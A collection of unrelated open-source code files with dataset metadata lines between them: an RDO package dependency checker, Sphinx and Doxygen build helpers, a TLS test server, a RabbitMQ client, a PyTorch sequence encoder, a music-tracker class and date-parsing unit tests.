"rdo-clients": "http://trunk.rdoproject.org/centos8-%s/component/clients/current" % release, # noqa
"rdo-cloudops": "http://trunk.rdoproject.org/centos8-%s/component/cloudops/current" % release, # noqa
"rdo-common": "http://trunk.rdoproject.org/centos8-%s/component/common/current" % release, # noqa
"rdo-compute": "http://trunk.rdoproject.org/centos8-%s/component/compute/current" % release, # noqa
"rdo-glance": "http://trunk.rdoproject.org/centos8-%s/component/glance/current" % release, # noqa
"rdo-manila": "http://trunk.rdoproject.org/centos8-%s/component/manila/current" % release, # noqa
"rdo-network": "http://trunk.rdoproject.org/centos8-%s/component/network/current" % release, # noqa
"rdo-octavia": "http://trunk.rdoproject.org/centos8-%s/component/octavia/current" % release, # noqa
"rdo-security": "http://trunk.rdoproject.org/centos8-%s/component/security/current" % release, # noqa
"rdo-swift": "http://trunk.rdoproject.org/centos8-%s/component/swift/current" % release, # noqa
"rdo-tempest": "http://trunk.rdoproject.org/centos8-%s/component/tempest/current" % release, # noqa
"rdo-tripleo": "http://trunk.rdoproject.org/centos8-%s/component/tripleo/current" % release, # noqa
"rdo-ui": "http://trunk.rdoproject.org/centos8-%s/component/ui/current" % release, # noqa
"rdo-component": "http://trunk.rdoproject.org/centos8-%s/component/validation/current" % release, # noqa
"deps": "http://trunk.rdoproject.org/centos8-%s/deps/latest" % release, # noqa
"build-deps": "http://trunk.rdoproject.org/centos8-%s/build-deps/latest" % release, # noqa
"deps-srpm": "http://trunk.rdoproject.org/centos8-%s/deps/latest/SRPMS" % release, # noqa
"build-srpm": "http://trunk.rdoproject.org/centos8-%s/build-deps/latest/SRPMS" % release, # noqa
"baseos": "http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os/", # noqa
"appstream": "http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/", # noqa
"baseos-srpm": "https://vault.centos.org/centos/8-stream/BaseOS/Source/", # noqa
"appstream-srpm": "https://vault.centos.org/centos/8-stream/AppStream/Source/", # noqa
}
releases = {
"master": RDO_TRUNK_C8,
"wallaby": RDO_TRUNK_C8,
"victoria": RDO_TRUNK_C8,
"ussuri": RDO_TRUNK_C8,
"train": RDO_TRUNK_C8,
}
return releases[release]
def eprint(*args, **kwargs):
kwargs.setdefault('file', sys.stderr)
kwargs.setdefault('flush', True)
print(*args, **kwargs)
def setup_dnf(release="wallaby"):
""" Setup dnf query with two repos
"""
repos = get_repos(release)
base = dnf.Base()
    # register a uniquely named repo for each configured URL
conf = base.conf
for name in repos.keys():
r = base.repos.add_new_repo(
("repo-%s" % name),
conf,
baseurl=[repos[name]],
skip_if_unavailable=False,
gpgcheck=0,
)
r.enable()
r.load()
base.fill_sack(load_system_repo=False, load_available_repos=True)
return base.sack.query()
class DepChecker:
def __init__(self, release, repo=None, source_repo=None, namespace='rpms'):
self._src_by_bin = None
self._bin_by_src = None
self.release = release
dnfquery = setup_dnf(release=release)
self.dnfquery = dnfquery
self.pagure_dict = {}
self.not_in_repo = []
def create_mapping(self):
src_by_bin = {} # Dict of source pkg objects by binary package objects
bin_by_src = {} # Dict of binary pkgobjects by srpm name
# Populate the dicts
for rpm_package in self.dnfquery:
if rpm_package.arch == 'src':
continue
srpm = self.SRPM(rpm_package)
src_by_bin[rpm_package] = srpm
if srpm:
if srpm.name in bin_by_src:
bin_by_src[srpm.name].append(rpm_package)
else:
bin_by_src[srpm.name] = [rpm_package]
self._src_by_bin = src_by_bin
self._bin_by_src = bin_by_src
@property
def by_src(self):
if not self._bin_by_src:
self.create_mapping()
return self._bin_by_src
@property
def by_bin(self):
if not self._src_by_bin:
self.create_mapping()
return self._src_by_bin
def find_dependent_packages(self, srpmname, ignore):
""" Return packages depending on packages built from SRPM ``srpmname``
that are built from different SRPMS not specified in ``ignore``.
:param ignore: list of binary package names that will not be
returned as dependent packages or considered as alternate
providers
:type ignore: list() of str()
:returns: OrderedDict dependent_package: list of requires only
provided by package ``srpmname`` {dep_pkg: [prov, ...]}
"""
# Some of this code was stolen from repoquery
dependent_packages = {}
        # Handle packages not found in the repo
try:
rpms = self.by_src[srpmname]
except KeyError:
# If we don't have a package in the repo, there is nothing to do
eprint(f"Package {srpmname} not found in repo")
self.not_in_repo.append(srpmname)
rpms = []
# provides of all packages built from ``srpmname``
provides = []
for pkg in rpms:
# add all the provides from the package as strings
string_provides = [str(prov) for prov in pkg.provides]
provides.extend(string_provides)
# add all files as provides
# pkg.files is a list of paths
# sometimes paths start with "//" instead of "/"
# normalise "//" to "/":
# os.path.normpath("//") == "//", but
# os.path.normpath("///") == "/"
file_provides = [os.path.normpath(f'//{fn}') for fn in pkg.files]
provides.extend(file_provides)
# Zip through the provides and find what's needed
for prov in provides:
# check only base provide, ignore specific versions
# "foo = 1.fc20" -> "foo"
base_provide, *_ = prov.split()
# FIXME: Workaround for:
# https://bugzilla.redhat.com/show_bug.cgi?id=1191178
if base_provide[0] == "/":
base_provide = base_provide.replace("[", "?")
base_provide = base_provide.replace("]", "?")
# Elide provide if also provided by another package
for pkg in self.dnfquery.filter(provides=base_provide, latest=1):
# FIXME: might miss broken dependencies in case the other
# provider depends on a to-be-removed package as well
if pkg.name in ignore:
# eprint(f"Ignoring provider package {pkg.name}")
pass
elif pkg not in rpms:
break
else:
for dependent_pkg in self.dnfquery.filter(
latest=1,
requires=base_provide):
# skip if the dependent rpm package belongs to the
# to-be-removed Fedora package
if dependent_pkg in self.by_src[srpmname]:
continue
# skip if the dependent rpm package is also a
# package that should be removed
if dependent_pkg.name in ignore:
continue
# use setdefault to either create an entry for the
# dependent package or add the required prov
dependent_packages.setdefault(dependent_pkg, set()).add(
prov)
return OrderedDict(sorted(dependent_packages.items()))
# This function was stolen from pungi
def SRPM(self, package):
"""Given a package object, get a package object for the
corresponding source rpm. Requires dnf still configured
and a valid package object."""
srpm, *_ = package.sourcerpm.split('.src.rpm')
sname, sver, srel = srpm.rsplit('-', 2)
return srpm_nvr_object(self.dnfquery, sname, sver, srel)
def srpm_nvr_object(query, name, version, release):
try:
srpmpo = query.filter(name=name,
version=version,
release=release,
latest=1,
arch='src').run()[0]
return srpmpo
except IndexError:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--release",
choices=["master", "wallaby", "victoria", "ussuri",
"train"],
default="master")
parser.add_argument("--pkg-name")
args = parser.parse_args()
eprint('Getting dependants for %s' % args.pkg_name)
depchecker = DepChecker(args.release)
dependants = depchecker.find_dependent_packages(args.pkg_name, [])
for dep in dependants:
print(dep.name + "-" + dep.evr + "." + dep.arch +
" from " + str(dep.reponame))
|
apache-2.0
| -6,268,966,650,308,080,000 | 39.472 | 112 | 0.579957 | false |
dhellmann/openstack-release-test
|
doc/source/conf.py
|
1
|
2460
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'release-test'
copyright = u'2013, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
apache-2.0
| 5,722,083,156,617,589,000 | 31.8 | 79 | 0.689837 | false |
tasleson/lsm-ci
|
testing/server.py
|
1
|
1369
|
#!/usr/bin/env python3
"""
Test development server.
"""
import socket
import ssl
import testlib
import traceback
import sys
bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(("", 8675))
bindsocket.listen(5)
while True:
print("Waiting for a client...")
new_socket, from_addr = bindsocket.accept()
print("Accepted a connection from %s" % str(from_addr))
connection = ssl.wrap_socket(
new_socket,
server_side=True,
certfile="server_cert.pem",
keyfile="server_key.pem",
ca_certs="client_cert.pem",
cert_reqs=ssl.CERT_REQUIRED,
)
in_line = "start"
t = testlib.Transport(connection)
try:
while in_line:
in_line = input("control> ")
if in_line:
args = in_line.split()
if len(args) > 1:
t.write_msg(testlib.Request(args[0], args[1:]))
else:
t.write_msg(testlib.Request(args[0]))
resp = t.read_msg()
print(resp)
except KeyboardInterrupt:
bindsocket.shutdown(socket.SHUT_RDWR)
bindsocket.close()
sys.exit(1)
except EOFError:
pass
except Exception:
traceback.print_exc(file=sys.stdout)
finally:
connection.close()
|
apache-2.0
| -4,696,118,900,612,178,000 | 22.603448 | 67 | 0.577064 | false |
telefonicaid/murano
|
murano/common/messaging/mqclient.py
|
1
|
3376
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import ssl as ssl_module
from eventlet import patcher
kombu = patcher.import_patched('kombu')
from oslo.serialization import jsonutils
from subscription import Subscription
log = logging.getLogger("murano-common.messaging")
class MqClient(object):
def __init__(self, login, password, host, port, virtual_host,
ssl=False, ca_certs=None):
ssl_params = None
if ssl is True:
ssl_params = {
'ca_certs': ca_certs,
'cert_reqs': ssl_module.CERT_REQUIRED
}
self._connection = kombu.Connection(
'amqp://{0}:{1}@{2}:{3}/{4}'.format(
login,
password,
host,
port,
virtual_host
), ssl=ssl_params
)
self._channel = None
self._connected = False
def __enter__(self):
self.connect()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def connect(self):
self._connection.connect()
self._channel = self._connection.channel()
self._connected = True
def close(self):
self._connection.close()
self._connected = False
def declare(self, queue, exchange='', enable_ha=False, ttl=0):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
queue_arguments = {}
if enable_ha is True:
# To use mirrored queues feature in RabbitMQ 2.x
# we need to declare this policy on the queue itself.
#
# Warning: this option has no effect on RabbitMQ 3.X,
# to enable mirrored queues feature in RabbitMQ 3.X, please
# configure RabbitMQ.
queue_arguments['x-ha-policy'] = 'all'
if ttl > 0:
queue_arguments['x-expires'] = ttl
exchange = kombu.Exchange(exchange, type='direct', durable=True)
queue = kombu.Queue(queue, exchange, queue, durable=True,
queue_arguments=queue_arguments)
bound_queue = queue(self._connection)
bound_queue.declare()
def send(self, message, key, exchange=''):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
producer = kombu.Producer(self._connection)
producer.publish(
exchange=str(exchange),
routing_key=str(key),
body=jsonutils.dumps(message.body),
message_id=str(message.id)
)
def open(self, queue, prefetch_count=1):
if not self._connected:
raise RuntimeError('Not connected to RabbitMQ')
return Subscription(self._connection, queue, prefetch_count)
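# Hedged usage sketch (not part of the original module), kept as a comment
# because it needs a running RabbitMQ broker. send() expects a message object
# exposing ``body`` and ``id``; the SimpleMessage helper, host and credentials
# below are assumptions of this example.
#
#   class SimpleMessage(object):
#       def __init__(self, id, body):
#           self.id = id
#           self.body = body
#
#   with MqClient('guest', 'guest', 'localhost', 5672, '/') as client:
#       client.declare('murano-example-queue')
#       client.send(SimpleMessage('msg-1', {'hello': 'world'}),
#                   key='murano-example-queue')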
|
apache-2.0
| 6,651,683,647,796,950,000 | 30.849057 | 72 | 0.601007 | false |
ASoftTech/Scons-Tools-Grbd
|
scons_tools_grbd/Tools/Docs/Doxygen/DoxygenCommon.py
|
1
|
12301
|
"""
DoxygenCommon
Common code associated with doxygen builders
"""
import os, sys, os.path as path, yaml
import SCons.Script
from SCons.Environment import Environment
from SCons.Script import File, Dir
import glob
from fnmatch import fnmatch
from functools import reduce
# Currently supported output formats and their default
# values and output locations.
# From left to right:
# 1. default setting YES|NO
# 2. default output folder for this format
# 3. name of the (main) output file
# 4. default extension "
# 5. field for overriding the output file extension
output_formats = {
"HTML": ("YES", "html", "index", ".html", "HTML_FILE_EXTENSION"),
"LATEX": ("YES", "latex", "refman", ".tex", ""),
"RTF": ("NO", "rtf", "refman", ".rtf", ""),
"MAN": ("NO", "man", "", ".3", "MAN_EXTENSION"),
"XML": ("NO", "xml", "index", ".xml", ""),
}
def detect(env):
"""Detect if mkdocs exe is detected on the system, or use user specified option"""
if 'Mkdocs' in env:
return env.Detect(env['Doxygen'])
else:
return env.Detect('doxygen')
def setup_opts(env):
"""Common setup of options for Mkdocs builders"""
    # Available Options - these set SCons environment defaults for the Doxygen builders
env.SetDefault(
# Default exe to launch
Doxygen = 'doxygen',
# Working directory is current directory (default)
Doxygen_WorkingDir = env.Dir('.'),
# Additional Arguments
Doxygen_ExtraArgs = [],
)
# Scanner related - modification of sources
def DoxySourceScan(node, env, path):
"""
Doxygen Doxyfile source scanner. This should scan the Doxygen file and add
any files used to generate docs to the list of source files.
"""
filepaths = DoxySourceFiles(node, env)
sources = map(lambda path: env.File(path), filepaths)
return sources
def DoxySourceScanCheck(node, env):
"""Check if we should scan this file"""
return path.isfile(node.path)
# Emitter related - modification of targets
def DoxyEmitter(target, source, env):
"""Doxygen Doxyfile emitter"""
# Choose Doxyfile as source file if not specified
if not source:
doxyfilenode = File('Doxyfile')
source.append(doxyfilenode)
else:
doxyfilenode = source[0]
doxy_fpath = str(doxyfilenode)
conf_dir = path.dirname(doxy_fpath)
data = DoxyfileParse(doxyfilenode.get_contents(), conf_dir)
targets = []
out_dir = data.get("OUTPUT_DIRECTORY", ".")
if not path.isabs(out_dir):
out_dir = path.join(conf_dir, out_dir)
# add our output locations
for (k, v) in output_formats.items():
if data.get("GENERATE_" + k, v[0]) == "YES":
# Initialize output file extension for MAN pages
if k == 'MAN':
# Is the given extension valid?
manext = v[3]
if v[4] and v[4] in data:
manext = data.get(v[4])
# Try to strip off dots
manext = manext.replace('.', '')
# Can we convert it to an int?
try:
e = int(manext)
                except ValueError:
# No, so set back to default
manext = "3"
od = env.Dir(path.join(out_dir, data.get(k + "_OUTPUT", v[1]), "man" + manext))
else:
od = env.Dir(path.join(out_dir, data.get(k + "_OUTPUT", v[1])))
# don't clobber target folders
env.Precious(od)
# set up cleaning stuff
env.Clean(od, od)
# Add target files
if k != "MAN":
# Is an extension override var given?
if v[4] and v[4] in data:
fname = v[2] + data.get(v[4])
else:
fname = v[2] + v[3]
of = env.File(path.join(out_dir, data.get(k + "_OUTPUT", v[1]), fname))
targets.append(of)
# don't clean single files, we remove the complete output folders (see above)
env.NoClean(of)
else:
# Special case: MAN pages
# We have to add a target file docs/man/man3/foo.h.3
# for each input file foo.h, so we scan the config file
# a second time... :(
filepaths = DoxySourceFiles(doxyfilenode, env)
for f in filepaths:
if path.isfile(f) and f != doxy_fpath:
of = env.File(path.join(out_dir,
data.get(k + "_OUTPUT", v[1]),
"man" + manext,
f + "." + manext))
targets.append(of)
# don't clean single files, we remove the complete output folders (see above)
env.NoClean(of)
# add the tag file if neccessary:
tagfile = data.get("GENERATE_TAGFILE", "")
if tagfile != "":
if not path.isabs(tagfile):
tagfile = path.join(conf_dir, tagfile)
targets.append(env.File(tagfile))
return (targets, source)
# Common between emmiter / scanners
def DoxySourceFiles(node, env):
"""
Scan the given node's contents (a Doxygen file) and add
any files used to generate docs to the list of source files.
"""
default_file_patterns = [
'*.c', '*.cc', '*.cxx', '*.cpp', '*.c++', '*.java', '*.ii', '*.ixx',
        '*.ipp', '*.i++', '*.inl', '*.h', '*.hh', '*.hxx', '*.hpp', '*.h++',
'*.idl', '*.odl', '*.cs', '*.php', '*.php3', '*.inc', '*.m', '*.mm',
'*.py',
]
default_exclude_patterns = [
'*~',
]
sources = []
# We're running in the top-level directory, but the doxygen
# configuration file is in the same directory as node; this means
# that relative pathnames in node must be adjusted before they can
# go onto the sources list
conf_dir = path.dirname(str(node))
data = DoxyfileParse(node.get_contents(), conf_dir)
if data.get("RECURSIVE", "NO") == "YES":
recursive = True
else:
recursive = False
file_patterns = data.get("FILE_PATTERNS", default_file_patterns)
exclude_patterns = data.get("EXCLUDE_PATTERNS", default_exclude_patterns)
input = data.get("INPUT")
if input:
for node in data.get("INPUT", []):
if not path.isabs(node):
node = path.join(conf_dir, node)
if path.isfile(node):
sources.append(node)
elif path.isdir(node):
if recursive:
for root, dirs, files in os.walk(node):
for f in files:
filename = path.join(root, f)
pattern_check = reduce(lambda x, y: x or bool(fnmatch(filename, y)), file_patterns, False)
exclude_check = reduce(lambda x, y: x and fnmatch(filename, y), exclude_patterns, True)
if pattern_check and not exclude_check:
sources.append(filename)
else:
for pattern in file_patterns:
sources.extend(glob.glob("/".join([node, pattern])))
else:
# No INPUT specified, so apply plain patterns only
if recursive:
for root, dirs, files in os.walk('.'):
for f in files:
filename = path.join(root, f)
pattern_check = reduce(lambda x, y: x or bool(fnmatch(filename, y)), file_patterns, False)
exclude_check = reduce(lambda x, y: x and fnmatch(filename, y), exclude_patterns, True)
if pattern_check and not exclude_check:
sources.append(filename)
else:
for pattern in file_patterns:
sources.extend(glob.glob(pattern))
# Add @INCLUDEd files to the list of source files:
for node in data.get("@INCLUDE", []):
sources.append(node)
# Add tagfiles to the list of source files:
for node in data.get("TAGFILES", []):
file = node.split("=")[0]
if not path.isabs(file):
file = path.join(conf_dir, file)
sources.append(file)
# Add additional files to the list of source files:
def append_additional_source(option, formats):
for f in formats:
if data.get('GENERATE_' + f, output_formats[f][0]) == "YES":
file = data.get(option, "")
if file != "":
if not path.isabs(file):
file = path.join(conf_dir, file)
if path.isfile(file):
sources.append(file)
break
append_additional_source("HTML_STYLESHEET", ['HTML'])
append_additional_source("HTML_HEADER", ['HTML'])
append_additional_source("HTML_FOOTER", ['HTML'])
return sources
def DoxyfileParse(file_contents, conf_dir, data=None):
"""
Parse a Doxygen source file and return a dictionary of all the values.
Values will be strings and lists of strings.
"""
file_contents = file_contents.decode('utf8', 'ignore')
if data is None:
data = {}
import shlex
lex = shlex.shlex(instream=file_contents, posix=True)
lex.wordchars += "*+./-:@"
lex.whitespace = lex.whitespace.replace("\n", "")
lex.escape = ""
lineno = lex.lineno
token = lex.get_token()
key = None
last_token = ""
key_token = True # The first token should be a key.
next_key = False
new_data = True
def append_data(data, key, new_data, token):
if new_data or len(data[key]) == 0:
data[key].append(token)
else:
data[key][-1] += token
while token:
if token in ['\n']:
if last_token not in ['\\']:
key_token = True
elif token in ['\\']:
pass
elif key_token:
key = token
key_token = False
else:
if token == "+=":
if key not in data:
data[key] = []
elif token == "=":
if key == "TAGFILES" and key in data:
append_data(data, key, False, "=")
new_data = False
elif key == "@INCLUDE" and key in data:
# don't reset the @INCLUDE list when we see a new @INCLUDE line.
pass
else:
data[key] = []
elif key == "@INCLUDE":
# special case for @INCLUDE key: read the referenced
# file as a doxyfile too.
nextfile = token
if not path.isabs(nextfile):
nextfile = path.join(conf_dir, nextfile)
if nextfile in data[key]:
raise Exception("recursive @INCLUDE in Doxygen config: " + nextfile)
data[key].append(nextfile)
fh = open(nextfile, 'r')
DoxyfileParse(fh.read(), conf_dir, data)
fh.close()
else:
append_data(data, key, new_data, token)
new_data = True
last_token = token
token = lex.get_token()
if last_token == '\\' and token != '\n':
new_data = False
append_data(data, key, new_data, '\\')
# compress lists of len 1 into single strings
for (k, v) in data.copy().items():
if len(v) == 0:
data.pop(k)
# items in the following list will be kept as lists and not converted to strings
if k in ["INPUT", "FILE_PATTERNS", "EXCLUDE_PATTERNS", "TAGFILES", "@INCLUDE"]:
continue
if len(v) == 1:
data[k] = v[0]
return data
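# Hedged self-check (not part of the original tool) showing the shape of the
# dict DoxyfileParse() returns: single values are collapsed to strings, while
# keys such as INPUT and FILE_PATTERNS stay lists. The Doxyfile snippet is
# made up for the example; running it still needs SCons and yaml importable.
if __name__ == '__main__':
    _sample = b'\n'.join([
        b'PROJECT_NAME = Demo',
        b'GENERATE_HTML = YES',
        b'INPUT = src include',
        b'FILE_PATTERNS = *.c *.h',
    ])
    _parsed = DoxyfileParse(_sample, '.')
    print(_parsed['PROJECT_NAME'])    # Demo
    print(_parsed['INPUT'])           # ['src', 'include']
    print(_parsed['FILE_PATTERNS'])   # ['*.c', '*.h']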
|
mit
| -959,350,828,641,448,600 | 33.862974 | 118 | 0.509959 | false |
mpdehaan/camp
|
camp/tracker/scenes.py
|
1
|
1248
|
"""
Copyright 2016, Michael DeHaan <michael.dehaan@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from camp.tracker.scene import Scene
class Scenes(object):
__slots__ = [ '_scenes', '_factory' ]
def __init__(self, song, **scenes):
self._factory = song
self._scenes = dict()
for (scene_name, scene) in scenes.items():
if getattr(scene, '__call__', None) is not None:
scene = scene(song)
if not isinstance(scene, Scene):
raise Exception("only a Scene is allowed inside of Scenes set method, got %s" % scene)
self._scenes[scene_name] = scene
scene._factory = song
scene.build()
def as_dict(self):
return self._scenes
|
apache-2.0
| -4,207,163,904,414,912,000 | 30.2 | 102 | 0.659455 | false |
nearai/program_synthesis
|
program_synthesis/naps/examples/seq2seq/pointer_seq_encoder.py
|
1
|
1895
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.autograd import Variable
class SeqEncoder(nn.Module):
def __init__(self, args):
super(SeqEncoder, self).__init__()
self.num_units = args.num_units
self.num_encoder_layers = args.num_encoder_layers
self.bidirectional = args.bidirectional
self._cuda = args.cuda
self.args = args
self.encoder = nn.GRU(
self.num_units, self.num_units, args.num_encoder_layers, batch_first=True,
dropout=args.encoder_dropout, bidirectional=self.bidirectional)
directions = 2 if self.bidirectional else 1
if directions * args.num_encoder_layers > 1:
self.encoder_proj = nn.Linear(directions * args.num_encoder_layers * self.num_units, self.num_units)
def forward(self, masked_padded_texts, text_lengths):
batch_size = masked_padded_texts.shape[0]
num_directions = 2 if self.bidirectional else 1
t_type = (torch.cuda.FloatTensor if self._cuda else torch.FloatTensor)
init = Variable(t_type(num_directions * self.num_encoder_layers, batch_size, self.num_units).fill_(0))
masked_packed_texts = pack_padded_sequence(masked_padded_texts, text_lengths, batch_first=True)
# memory: torch.nn.utils.rnn.PackedSequence
# [bsz x len x (dim * num_directions)]
memory, hidden = self.encoder(masked_packed_texts, init)
memory, _ = pad_packed_sequence(memory, batch_first=True)
if num_directions * self.num_encoder_layers > 1:
# Make batch-first
hidden = hidden.transpose(0, 1).contiguous()
# Project to num_units units
hidden = self.encoder_proj(hidden.view(hidden.shape[0], -1))
else:
hidden = hidden.squeeze(0)
return hidden, memory
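# Hedged usage sketch (not part of the original module): the encoder expects
# already-embedded, padded inputs of shape [batch, max_len, num_units] and
# lengths sorted in decreasing order. The args namespace below only carries
# the fields this class reads and is an assumption of this example.
if __name__ == '__main__':
    import argparse
    demo_args = argparse.Namespace(num_units=16, num_encoder_layers=1,
                                   bidirectional=True, cuda=False,
                                   encoder_dropout=0.0)
    encoder = SeqEncoder(demo_args)
    texts = torch.randn(2, 5, demo_args.num_units)   # batch of 2, max length 5
    hidden, memory = encoder(texts, [5, 3])          # lengths must be sorted
    print(hidden.shape)   # torch.Size([2, 16]) after the projection
    print(memory.shape)   # torch.Size([2, 5, 32]) for a bidirectional GRU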
|
apache-2.0
| 2,590,437,045,472,163,000 | 45.219512 | 112 | 0.65277 | false |
chrisatthestudy/jot
|
src/test.py
|
1
|
8053
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for the jot command-line tool.
"""
# Standard library imports
import datetime
import os
# Third party imports
# Application specific imports
import jot
if (__name__ == "__main__"):
# Basic unit tests for API()
import unittest
class APITestCase(unittest.TestCase):
def setUp(self):
self.api = jot.Jot()
def tearDown(self):
self.api = None
try:
os.remove("jot.txt")
            except OSError:
pass
def testBasic(self):
# Verify that the instance was created
self.assertNotEqual(self.api, None)
def testExecute(self):
# Verify that the main execution routine returns True
self.assertEqual(self.api.execute({"<date>": "2015-12-10", "<entry>": "Execute test"}), True)
def test_adjust_date(self):
# Verify that adjust_date() works in the simplest version
today = datetime.datetime.now()
self.assertEqual(self.api.adjust_date(today, ''), today)
def test_adjust_date_today(self):
# Verify that adjust_date() returns the correct value
# for 'today'
today = datetime.datetime.now()
self.assertEqual(self.api.adjust_date(today, 'today'), today)
def test_adjust_date_yesterday(self):
# Verify that adjust_date() returns the correct value
# for 'yesterday'
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(1)
self.assertEqual(self.api.adjust_date(today, 'yesterday'), yesterday)
def test_adjust_date_this_week(self):
# Verify that adjust_date() returns the correct value
# for 'this-week'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_week = datetime.datetime.strptime("2015-07-20", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-week'), this_week)
def test_adjust_date_this_month(self):
# Verify that adjust_date() returns the correct value
# for 'this-month'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_month = datetime.datetime.strptime("2015-07-01", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-month'), this_month)
def test_adjust_date_this_year(self):
# Verify that adjust_date() returns the correct value
# for 'this-year'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
this_year = datetime.datetime.strptime("2015-01-01", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'this-year'), this_year)
def test_adjust_date_last_week(self):
# Verify that adjust_date() returns the correct value
# for 'last-week'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
last_week = datetime.datetime.strptime("2015-07-16", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-week'), last_week)
def test_adjust_date_last_month(self):
# Verify that adjust_date() returns the correct value
# for 'last-month'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2015-06-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_last_month_for_february(self):
# Verify that adjust_date() returns the correct value
# for 'last-month' when we are at the end of March and the day
# would not be valid for February
today = datetime.datetime.strptime("2015-03-30", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2015-02-28", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_last_month_across_year(self):
# Verify that adjust_date() returns the correct value
# for 'last-month' when last month is in the previous year
today = datetime.datetime.strptime("2015-01-18", "%Y-%m-%d")
last_month = datetime.datetime.strptime("2014-12-18", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'last-month'), last_month)
def test_adjust_date_day_nn(self):
# Verify that adjust_date() returns the correct value
# for 'day-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
day_nn = datetime.datetime.strptime("2015-07-08", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'day-08'), day_nn)
def test_adjust_date_month_nn(self):
# Verify that adjust_date() returns the correct value
# for 'month-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
month_nn = datetime.datetime.strptime("2015-03-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'month-03'), month_nn)
def test_adjust_date_year_nn(self):
# Verify that adjust_date() returns the correct value
# for 'year-nn'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
year_nn = datetime.datetime.strptime("2012-07-23", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, 'year-2012'), year_nn)
def test_adjust_date_days_ago(self):
# Verify that adjust_date() returns the correct value for
# 'nn-days-ago'
today = datetime.datetime.strptime("2015-07-23", "%Y-%m-%d")
daysago = datetime.datetime.strptime("2015-07-20", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, '3-days-ago'), daysago)
def test_adjust_date_days_ago_across_month(self):
# Verify that adjust_date() returns the correct value for
# 'nn-days-ago' when it crosses a month boundary
today = datetime.datetime.strptime("2015-07-03", "%Y-%m-%d")
daysago = datetime.datetime.strptime("2015-06-28", "%Y-%m-%d")
self.assertEqual(self.api.adjust_date(today, '5-days-ago'), daysago)
def test_date_stamp(self):
# Verify that date_stamp() returns the correct value in the
# simplest case.
self.assertEqual(self.api.date_stamp('2015-03-21'), '2015-03-21')
